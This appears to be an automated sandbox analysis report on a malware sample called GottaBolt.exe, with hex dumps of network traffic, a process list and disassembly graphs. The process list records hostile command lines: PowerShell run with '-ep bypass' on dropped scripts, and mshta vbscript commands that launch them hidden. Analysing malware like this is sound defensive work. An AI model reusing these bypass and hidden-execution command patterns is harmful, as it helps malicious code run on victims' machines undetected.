                                                                        Data Ascii: :7<TL2iV7.x`^TUya.75P=-m^Mo%BUPd@2~?fkl Rf0\{c"s(#Ng:d>lczt~/X4l2oVlTe*Hg1X?\@C=lc+qi;1t3$O
                                                                        2024-11-22 16:03:27 UTC16384INData Raw: 6b 87 f1 dd c0 9a e5 12 77 69 97 28 22 59 cd 8d af 23 ae a2 a7 56 c0 09 9f f5 cc c9 5e 4c 49 d4 28 fc f5 bf 52 24 66 c7 cc 1f 2f 38 33 c6 1a 89 60 27 74 96 74 51 60 a4 2b b0 8b 19 ae fd 67 f2 5a 52 0e d9 f3 35 6c 69 0c e4 ed c1 e1 8c 95 a8 c0 a6 de 1d db aa 2c 9a 3e 9c 22 54 65 18 8e 87 57 f0 a1 cb 9c fb 3b 9b f0 d7 91 66 f6 ec dd 84 5f 6a 42 43 a4 83 d4 e9 f5 18 bd eb c3 d4 b5 5b b1 38 b6 89 f7 95 c5 fc 9e 7b 9f f9 73 97 f3 e3 4e 0d 59 ca 06 58 d4 0d c0 67 d2 34 16 49 e5 09 f3 77 8c 46 37 53 6c 22 a7 21 b5 f3 10 91 d5 5b f8 ac ac c7 c2 b8 18 de bf 39 c6 34 83 e1 0c 9a 97 40 ea bf 5b 38 05 17 30 f9 90 00 9e 9d 87 88 10 29 67 f5 bf 20 96 8b 09 f9 d7 be 8b d0 f1 f1 2c be f8 99 a0 40 2d 86 b8 de e2 72 f8 06 2e d4 c6 93 f2 77 2e 7d 9e 84 51 61 39 1f 85 df 3d
                                                                        Data Ascii: kwi("Y#V^LI(R$f/83`'ttQ`+gZR5li,>"TeW;f_jBC[8{sNYXg4IwF7Sl"![94@[80)g ,@-r.w.}Qa9=
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: 11 44 de 8e 28 9e 7e 5a cb c0 33 c2 b3 e9 c9 a4 e9 52 18 a5 8f 0f 23 fe 7c 35 f7 5e 08 2c 35 62 3a b5 c1 2f 28 98 67 88 75 58 3f 2c 96 2c 64 ab e0 11 81 aa b5 42 56 de 23 d1 51 15 bd ed aa 42 9e 08 1c f7 27 9c 2d b7 e6 30 a0 bf 09 0f db cb 90 15 fa 3b b3 50 97 c2 07 ae bc 8f 94 61 6c f4 3f 6c 0a 66 31 73 f2 5f e1 5a b5 30 ec ab 4c bb d9 77 a1 ab a4 f1 5b d2 8e d9 c5 6a a6 52 84 e1 ec 68 3e 97 d9 62 ab de 44 de 85 d3 4c 5c 95 81 67 9d 2d ab 62 76 32 ee 49 2e 0e bb 7c b9 66 f4 84 bd 92 96 dc 35 8a c0 39 75 39 fa b5 7e 84 6f bf 42 df c7 6b 18 52 f4 98 9d 2b 74 b8 b3 a6 0f 13 14 77 51 96 a0 ca 9b 63 83 58 65 29 ca 76 af 10 66 8f 19 c8 8e d0 3e 20 cc b6 fd 6b 57 a4 9f 6f 42 e3 63 09 7c 14 a5 ba 70 3c 8b f4 dc 89 ca 48 66 50 a7 09 fb ba 3d c8 4d 68 65 58 c7 23
                                                                        Data Ascii: D(~Z3R#|5^,5b:/(guX?,,dBV#QB'-0;Pal?lf1s_Z0Lw[jRh>bDL\g-bv2I.|f59u9~oBkR+twQcXe)vf> kWoBc|p<HfP=MheX#
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: 64 9d fa 26 b4 9e 74 e3 71 77 20 e2 db 24 f9 da 23 60 fd 3d 92 2c 2b f2 e4 98 f0 11 6a 34 2f b3 45 ff 36 53 fe bd c1 c4 d7 8a 1b 53 27 22 fb a4 91 6b da a9 b4 bd f4 c3 c5 b0 9c 74 05 2d 76 ae ee e3 c8 94 2f 82 dd bd 9c ad 6b 36 a0 72 d5 1f b3 87 c2 5c fa f5 89 bf 3a 87 f9 b1 f9 29 8d 7b 6e d2 39 ff 05 9f 2a c3 50 70 e8 e6 4f 5c 23 91 d7 1b b8 3d e5 08 47 64 c3 68 98 e8 4f f5 ef 83 8c fb e5 c6 5e 4d 37 9a b4 c7 f3 ec cf 6f 3a f2 ee 71 f2 7d 07 fa a1 69 7c d2 d9 c1 d8 f5 67 c8 5d 3e 1f 17 8b 42 b2 94 62 b1 6c ff 84 c5 c6 1b d4 04 77 f2 31 f8 2a 95 89 65 a4 18 cd e6 b6 8e 1f 1f 27 39 30 db a1 99 cb 6a 91 08 05 fc 66 88 d3 5c 54 9e 97 92 28 5f 4a 81 eb 59 7a 3a d6 e2 72 69 36 e5 93 23 b9 5e b2 81 4d 87 27 e0 69 6d 81 f8 f1 65 14 bd 7f 8a b3 82 60 3f e4 9f e4
                                                                        Data Ascii: d&tqw $#`=,+j4/E6SS'"kt-v/k6r\:){n9*PpO\#=GdhO^M7o:q}i|g]>Bblw1*e'90jf\T(_JYz:ri6#^M'ime`?
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: fc 12 ba 9f d2 d0 f3 7d c6 da 97 82 41 be bc 54 70 ae b3 90 0d 17 dc bf 50 15 33 75 c4 89 f1 2d e2 64 ca 28 8e 78 c4 a2 b9 42 9e 15 e9 d9 1c aa 96 e1 de dd 27 1c ed 98 89 5b 9e 07 6f c6 af 43 71 a0 28 b9 13 ec e8 29 b2 c4 61 45 15 b5 e3 ba 48 f8 3c 86 4a 3f 43 ae 04 9d 62 e8 b5 af 78 47 ee 25 e5 60 1b d2 12 65 d8 6b fb e0 f8 ee 17 d2 ff 9a b8 3c 64 38 71 eb 02 68 12 88 c2 b9 a3 4b d8 f3 36 95 a8 f3 eb 28 f8 9f 54 e9 9a 70 ab 28 9e 22 2f 4f 46 95 44 31 c7 62 84 40 8c 5d b8 bf 4f 85 f9 d7 86 b3 58 5d 9c 1a e1 5b ac f9 5b c5 30 6d 67 ce 3d 8f 45 e4 d7 3d 9e 9b 89 91 b8 c0 9f b7 b6 a2 54 b5 e4 52 3d 44 8d d4 e9 a2 78 cc eb c0 54 f8 07 0a e2 a3 08 1a 73 92 01 7f fb 60 ad 1d cb 92 d5 50 fa f7 40 00 81 5f 91 98 b3 0e a1 55 ef e8 92 6a 60 55 5f 91 a0 ae ab e9 4a
                                                                        Data Ascii: }ATpP3u-d(xB'[oCq()aEH<J?CbxG%`ek<d8qhK6(Tp("/OFD1b@]OX][[0mg=E=TR=DxTs`P@_Uj`U_J
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: 3b fb 22 9d dd 4a 63 c4 42 ee fd 3c 43 ae d8 5f 36 a7 ec a6 52 34 92 7e 9f 87 13 32 a0 86 34 1b 7b ac 55 e7 61 79 f5 34 93 07 8f e6 cd 91 68 b6 38 d9 a1 91 d9 40 f9 9b 8d 48 49 5e 63 63 98 35 33 ef 1d 67 50 de 71 be f6 b3 e0 d0 a5 65 2c 96 2b e0 f6 50 4b 96 14 f6 b0 7c bd 15 1d 59 0d 74 3c 9f 4a cd c6 c1 a8 78 4a 62 d2 28 c2 b0 2b f9 98 3d c8 c2 a5 38 87 4c ff a3 4c 7a f1 00 5b f9 33 6c 3a b4 06 75 b9 59 02 98 17 f1 7e eb 6f be 9d b8 4d c3 99 43 8c b0 bd cc 99 ce a7 6c 78 2a c6 fa 24 7f 64 05 11 f9 63 ed 4c ae 47 21 bf 9e ac c2 22 78 31 87 27 ce e1 ed a5 b5 b8 1c 99 47 8a 82 39 01 12 79 18 26 58 22 7f 36 89 15 b2 bb 38 16 65 c1 8c d8 75 44 39 cb d3 31 af 41 80 39 1d e6 d7 5f 61 d6 64 69 36 af d0 63 da 58 7f 8c 6a e4 e9 79 5c c5 8f a4 04 c4 cd ec 08 1c e5
                                                                        Data Ascii: ;"JcB<C_6R4~24{Uay4h8@HI^cc53gPqe,+PK|Yt<JxJb(+=8LLz[3l:uY~oMClx*$dcLG!"x1'G9y&X"68euD91A9_adi6cXjy\
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: cb 18 e6 e9 8c 91 5f 0f a6 c2 3b dd 58 6e 4d c5 65 69 f4 2b 87 e0 b7 43 9a 24 f5 3f b4 7d 5b ce c6 e7 15 a8 ae 96 e3 9c c2 3b dc 57 3e 41 ba 26 8e 53 92 97 f1 8d 82 9f 1d 6b d9 d4 f4 96 b2 bb 33 c9 eb 88 61 d9 43 25 8a 0b d6 b3 58 ee 0b 69 da 75 3c 94 12 25 e7 46 03 c9 82 a0 ff 12 66 46 26 5a 91 1b 53 d3 a8 9e a1 8f dc 9a 72 ce 6d 91 45 4a 98 99 dd ee 53 a0 51 9d 4f b3 3a b1 de 2c 46 7a e1 10 46 05 85 61 b3 3f 84 ed 6e fb 99 a2 54 8e f5 ec d5 dc 18 99 c3 3f bb e7 7c a9 df 44 75 ff 0d 04 07 34 71 5a 7b 35 33 ac a6 50 7d eb 34 e7 2b ac b0 99 32 8d 1f 13 2c d9 7a 76 1f c3 cf 75 90 dd e0 84 9f 7a 1d 7f b5 7e a0 1a 53 c3 15 9f 30 2a 3f 5f e7 42 bd 33 0d d6 7b 68 4a 6b 24 f8 f3 16 b2 ee 44 e3 d4 5d 83 b7 fd 40 de de 6e 27 4d 66 04 f6 9a ab 28 bc 97 c1 42 91 e9
                                                                        Data Ascii: _;XnMei+C$?}[;W>A&Sk3aC%Xiu<%FfF&ZSrmEJSQO:,FzFa?nT?|Du4qZ{53P}4+2,zvuz~S0*?_B3{hJk$D]@n'Mf(B
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: 7c 92 dc df 10 f4 ab 8a 6f 5e 8b f9 f1 e3 01 73 7c fc 04 0c eb cb 43 19 79 84 fe 6e 41 53 e2 2a e3 dc 9d 39 2f 75 90 d3 49 01 3c d9 5b 45 d8 c0 54 9e 24 74 62 32 f6 05 f7 0d 07 62 d8 cf 98 fd 02 26 ef 95 3a 4e 71 5d 1b e6 dd 77 19 3f db 1f f5 df e6 64 e8 85 91 e1 f1 11 93 79 03 91 0e e8 8f e3 9f d1 78 ce cc 64 dd d3 3f 0c fd 3c 9c 2d 23 c7 73 d7 77 86 e0 e7 4b 29 29 93 e4 de b1 f1 f8 3c ef c7 97 c3 55 0c cb fb c2 07 df 63 bc 7a be 90 68 01 5f 45 c8 d6 f1 66 c4 16 46 ad 2b 65 52 45 15 2b 83 73 49 7d fb 1d 8d 5e 57 b6 57 87 f2 e0 be 12 ae ce 73 05 9c fc 8b 57 2f 0d d8 ed de 46 b8 df 1f 56 8d da 8f 87 bd 2d 3f 36 1c 14 b0 44 2b 77 e7 36 51 59 bf 9f ec 8b 3a 9c 6b ed 66 d0 8a 0f 84 6a 87 11 30 46 0b 23 1f 05 2e ef e9 62 a0 f2 23 0e 2f 18 88 de 43 79 6a 4b 6e
                                                                        Data Ascii: |o^s|CynAS*9/uI<[ET$tb2b&:Nq]w?dyxd?<-#swK))<Uczh_EfF+eRE+sI}^WWsW/FV-?6D+w6QY:kfj0F#.b#/CyjKn
                                                                        2024-11-22 16:03:28 UTC16384INData Raw: 5b 47 8a 95 0e 0d 6c 5e 37 80 eb 06 b3 f8 be f5 cb ff fe 93 bd 67 c4 56 6a ea 85 19 62 94 ce e6 8b ff 71 42 77 19 2f 15 8a 71 ba f9 89 3f 7f a5 b0 3c fb 07 9f 0b 3f 59 ed 70 8f c1 09 d1 04 fb 54 93 e5 9d c1 a3 c4 65 2c 39 d6 c9 c1 a5 0f d0 4f ca c7 64 ff 06 4e e7 94 71 f3 a3 11 ce df af 93 7c e3 24 97 34 e2 99 91 92 8a 46 fa 10 46 b8 9c e3 4f a2 2a f7 16 68 50 7c 2a 94 e5 06 bb 11 73 51 a7 ff be b7 28 e7 6e 44 44 f2 07 9e 9f b3 89 da 3a 84 a4 ba 38 4c aa e6 20 b2 71 09 d7 2d 06 b2 78 fe 7e a2 95 ce 33 6f 4b 23 4f e6 2e 47 a9 6b 05 63 5a 86 32 2d ba 85 23 32 a5 fc f1 56 65 a0 40 18 74 5f 8b f2 6b d1 71 c4 fa ca 39 71 2a 93 1f 0d 57 89 3a 95 81 53 46 21 45 d3 aa 79 a1 7a 98 29 1d 57 39 d7 7c 19 0b d5 4b 2c 91 7f 82 92 bd 34 d5 71 fa 94 f9 4b f1 2e cf 82 9f
                                                                        Data Ascii: [Gl^7gVjbqBw/q?<?YpTe,9OdNq|$4FFO*hP|*sQ(nDD:8L q-x~3oK#O.GkcZ2-#2Ve@t_kq9q*W:SF!Eyz)W9|K,4qK.


                                                                        Statistics

                                                                        CPU Usage

                                                                        Click to jump to process

                                                                        Memory Usage

                                                                        Click to jump to process

                                                                        High Level Behavior Distribution

                                                                        Click to dive into process behavior distribution

                                                                        Behavior

                                                                        Click to jump to process

                                                                        System Behavior

                                                                        General

                                                                        Target ID:0
                                                                        Start time:11:03:04
                                                                        Start date:22/11/2024
                                                                        Path:C:\Users\user\Desktop\GottaBolt.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Users\user\Desktop\GottaBolt.exe"
                                                                        Imagebase:0x265044f0000
                                                                        File size:25'560 bytes
                                                                        MD5 hash:981C56E26AE89A9190D1F1DB9D2683CE
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:low
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:10
                                                                        Start time:11:03:17
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"powershell" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc1.ps1"
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:11
                                                                        Start time:11:03:17
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:true
                                                                        Has administrator privileges:true
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:13
                                                                        Start time:11:03:21
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
                                                                        Imagebase:0x7ff70f050000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:14
                                                                        Start time:11:03:22
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:15
                                                                        Start time:11:03:22
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:false

                                                                        General

                                                                        Target ID:16
                                                                        Start time:12:10:24
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
                                                                        Imagebase:0x7ff70f050000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:17
                                                                        Start time:12:10:25
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:18
                                                                        Start time:12:10:25
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:21
                                                                        Start time:12:11:24
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\mshta.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\mshta.EXE vbscript:Execute("CreateObject(""WScript.Shell"").Run ""powershell -ep bypass -File """"C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 """""" ,0:close")
                                                                        Imagebase:0x7ff70f050000
                                                                        File size:14'848 bytes
                                                                        MD5 hash:0B4340ED812DC82CE636C00FA5C9BEF2
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:moderate
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:22
                                                                        Start time:12:11:24
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -File "C:\Users\user\AppData\Roaming\Adobe\pIWRdrgc2.ps1 "
                                                                        Imagebase:0x7ff741d30000
                                                                        File size:452'608 bytes
                                                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Reputation:high
                                                                        Has exited:true

                                                                        General

                                                                        Target ID:23
                                                                        Start time:12:11:25
                                                                        Start date:22/11/2024
                                                                        Path:C:\Windows\System32\conhost.exe
                                                                        Wow64 process (32bit):false
                                                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                        Imagebase:0x7ff75da10000
                                                                        File size:862'208 bytes
                                                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                        Has elevated privileges:false
                                                                        Has administrator privileges:false
                                                                        Programmed in:C, C++ or other language
                                                                        Has exited:true

                                                                        Disassembly

                                                                        Reset < >

                                                                          Execution Graph

                                                                          Execution Coverage:9.6%
                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                          Signature Coverage:0%
                                                                          Total number of Nodes:5
                                                                          Total number of Limit Nodes:1
                                                                          execution_graph 6013 7ffaacccec64 6014 7ffaacccec6d 6013->6014 6015 7ffaacccec38 6014->6015 6016 7ffaacccece9 LoadLibraryExW 6014->6016 6017 7ffaaccced1d 6016->6017

                                                                          Executed Functions

                                                                          Function 00007FFAACCC48D6 Relevance: .5, Instructions: 473COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 300 7ffaaccc48d6-7ffaaccc48e3 301 7ffaaccc48e5-7ffaaccc48ed 300->301 302 7ffaaccc48ee-7ffaaccc49b7 300->302 301->302 306 7ffaaccc4a23 302->306 307 7ffaaccc49b9-7ffaaccc49c2 302->307 309 7ffaaccc4a25-7ffaaccc4a4a 306->309 307->306 308 7ffaaccc49c4-7ffaaccc49d0 307->308 310 7ffaaccc49d2-7ffaaccc49e4 308->310 311 7ffaaccc4a09-7ffaaccc4a21 308->311 316 7ffaaccc4ab6 309->316 317 7ffaaccc4a4c-7ffaaccc4a55 309->317 312 7ffaaccc49e8-7ffaaccc49fb 310->312 313 7ffaaccc49e6 310->313 311->309 312->312 315 7ffaaccc49fd-7ffaaccc4a05 312->315 313->312 315->311 319 7ffaaccc4ab8-7ffaaccc4b60 316->319 317->316 318 7ffaaccc4a57-7ffaaccc4a63 317->318 320 7ffaaccc4a65-7ffaaccc4a77 318->320 321 7ffaaccc4a9c-7ffaaccc4ab4 318->321 330 7ffaaccc4b62-7ffaaccc4b6c 319->330 331 7ffaaccc4bce 319->331 322 7ffaaccc4a79 320->322 323 7ffaaccc4a7b-7ffaaccc4a8e 320->323 321->319 322->323 323->323 325 7ffaaccc4a90-7ffaaccc4a98 323->325 325->321 330->331 332 7ffaaccc4b6e-7ffaaccc4b7b 330->332 333 7ffaaccc4bd0-7ffaaccc4bf9 331->333 334 7ffaaccc4bb4-7ffaaccc4bcc 332->334 335 7ffaaccc4b7d-7ffaaccc4b8f 332->335 340 7ffaaccc4c63 333->340 341 7ffaaccc4bfb-7ffaaccc4c06 333->341 334->333 336 7ffaaccc4b93-7ffaaccc4ba6 335->336 337 7ffaaccc4b91 335->337 336->336 339 7ffaaccc4ba8-7ffaaccc4bb0 336->339 337->336 339->334 342 7ffaaccc4c65-7ffaaccc4cf6 340->342 341->340 343 7ffaaccc4c08-7ffaaccc4c16 341->343 351 7ffaaccc4cfc-7ffaaccc4d0b 342->351 344 7ffaaccc4c18-7ffaaccc4c2a 343->344 345 7ffaaccc4c4f-7ffaaccc4c61 343->345 347 7ffaaccc4c2c 344->347 348 7ffaaccc4c2e-7ffaaccc4c41 344->348 345->342 347->348 348->348 349 7ffaaccc4c43-7ffaaccc4c4b 348->349 349->345 352 7ffaaccc4d13-7ffaaccc4d78 call 7ffaaccc4d94 351->352 353 7ffaaccc4d0d 351->353 360 7ffaaccc4d7a 352->360 361 7ffaaccc4d7f-7ffaaccc4d93 352->361 353->352 360->361
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7701837602023648f8966509a6ea6c99be79dcb0ab63f162944cc006b1e1c424
                                                                          • Instruction ID: 96ede3a8b69471931735acf5dab4b79c4c04d39181ff3ad6346d230d4d8e1b11
                                                                          • Opcode Fuzzy Hash: 7701837602023648f8966509a6ea6c99be79dcb0ab63f162944cc006b1e1c424
                                                                          • Instruction Fuzzy Hash: 20F17D7090CA8D8FEBA9DF28D855BF937E1EF55310F04826AE84DC7291DF3499458B81
                                                                          Function 00007FFAACCC5682 Relevance: .5, Instructions: 460COMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 439 7ffaaccc5682-7ffaaccc568f 440 7ffaaccc569a-7ffaaccc5767 439->440 441 7ffaaccc5691-7ffaaccc5699 439->441 445 7ffaaccc57d3 440->445 446 7ffaaccc5769-7ffaaccc5772 440->446 441->440 447 7ffaaccc57d5-7ffaaccc57fa 445->447 446->445 448 7ffaaccc5774-7ffaaccc5780 446->448 454 7ffaaccc5866 447->454 455 7ffaaccc57fc-7ffaaccc5805 447->455 449 7ffaaccc5782-7ffaaccc5794 448->449 450 7ffaaccc57b9-7ffaaccc57d1 448->450 452 7ffaaccc5798-7ffaaccc57ab 449->452 453 7ffaaccc5796 449->453 450->447 452->452 456 7ffaaccc57ad-7ffaaccc57b5 452->456 453->452 458 7ffaaccc5868-7ffaaccc588d 454->458 455->454 457 7ffaaccc5807-7ffaaccc5813 455->457 456->450 459 7ffaaccc5815-7ffaaccc5827 457->459 460 7ffaaccc584c-7ffaaccc5864 457->460 464 7ffaaccc58fb 458->464 465 7ffaaccc588f-7ffaaccc5899 458->465 461 7ffaaccc5829 459->461 462 7ffaaccc582b-7ffaaccc583e 459->462 460->458 461->462 462->462 466 7ffaaccc5840-7ffaaccc5848 462->466 468 7ffaaccc58fd-7ffaaccc592b 464->468 465->464 467 7ffaaccc589b-7ffaaccc58a8 465->467 466->460 469 7ffaaccc58aa-7ffaaccc58bc 467->469 470 7ffaaccc58e1-7ffaaccc58f9 467->470 475 7ffaaccc592d-7ffaaccc5938 468->475 476 7ffaaccc599b 468->476 471 7ffaaccc58c0-7ffaaccc58d3 469->471 472 7ffaaccc58be 469->472 470->468 471->471 474 7ffaaccc58d5-7ffaaccc58dd 471->474 472->471 474->470 475->476 478 7ffaaccc593a-7ffaaccc5948 475->478 477 7ffaaccc599d-7ffaaccc5a75 476->477 488 7ffaaccc5a7b-7ffaaccc5a8a 477->488 479 7ffaaccc594a-7ffaaccc595c 478->479 480 7ffaaccc5981-7ffaaccc5999 478->480 482 7ffaaccc5960-7ffaaccc5973 479->482 483 7ffaaccc595e 479->483 480->477 482->482 484 7ffaaccc5975-7ffaaccc597d 482->484 483->482 484->480 489 7ffaaccc5a92-7ffaaccc5af4 call 7ffaaccc5b10 488->489 490 7ffaaccc5a8c 488->490 497 7ffaaccc5af6 489->497 498 7ffaaccc5afb-7ffaaccc5b0f 489->498 490->489 497->498
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 329dc9405a66feb4d083c0f86dd815619b3fadf484b1989c3a068fe5ac8c910c
                                                                          • Instruction ID: 510601466af15dbce00bfd37b72b92891ef9254a89112e956b0773b8e11048aa
                                                                          • Opcode Fuzzy Hash: 329dc9405a66feb4d083c0f86dd815619b3fadf484b1989c3a068fe5ac8c910c
                                                                          • Instruction Fuzzy Hash: ECE1C27090CA8E8FEBA9DF28C8557E977E1EF55311F04826AD84DC7291DE74E88487C1
                                                                          Function 00007FFAACCCEC64 Relevance: 1.6, APIs: 1, Instructions: 137libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
                                                                          control_flow_graph 112 7ffaacccec64-7ffaacccec6b 113 7ffaacccec76-7ffaacccec89 112->113 114 7ffaacccec6d-7ffaacccec75 112->114 115 7ffaacccec38-7ffaacccec3b 113->115 116 7ffaacccec8c-7ffaacccecdf 113->116 114->113 117 7ffaacccec43-7ffaacccec5f 115->117 118 7ffaacccec3d 115->118 121 7ffaacccece9-7ffaaccced1b LoadLibraryExW 116->121 122 7ffaacccece1-7ffaacccece6 116->122 118->117 123 7ffaaccced23-7ffaaccced4a 121->123 124 7ffaaccced1d 121->124 122->121 124->123
                                                                          APIs
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1524136311.00007FFAACCC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAACCC0000, based on PE: false
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_7ffaaccc0000_GottaBolt.jbxd
                                                                          Similarity
                                                                          • API ID: LibraryLoad
                                                                          • String ID:
                                                                          • API String ID: 1029625771-0
                                                                          • Opcode ID: 1da83a684b8965ef30b9c9b26c4dbdd86f3b53420521002b6279335ab6b3c21c
                                                                          • Instruction ID: 506c309f7d316e8cb060bc419ea8608265ddd740db803322bc5e94ec967b4394
                                                                          • Opcode Fuzzy Hash: 1da83a684b8965ef30b9c9b26c4dbdd86f3b53420521002b6279335ab6b3c21c
                                                                          • Instruction Fuzzy Hash: 4841027190CA4C8FEB59DFA8944AAE9BBE0FF56320F04822FD01DC3651CB75A4198BC1
                                                                          Function 00007FFAACCCE692 Relevance: 1.6, APIs: 1, Instructions: 98libraryCOMMON
                                                                          Download Yara Rule

                                                                          Control-flow Graph

                                                                          • Executed
                                                                          • Not Executed
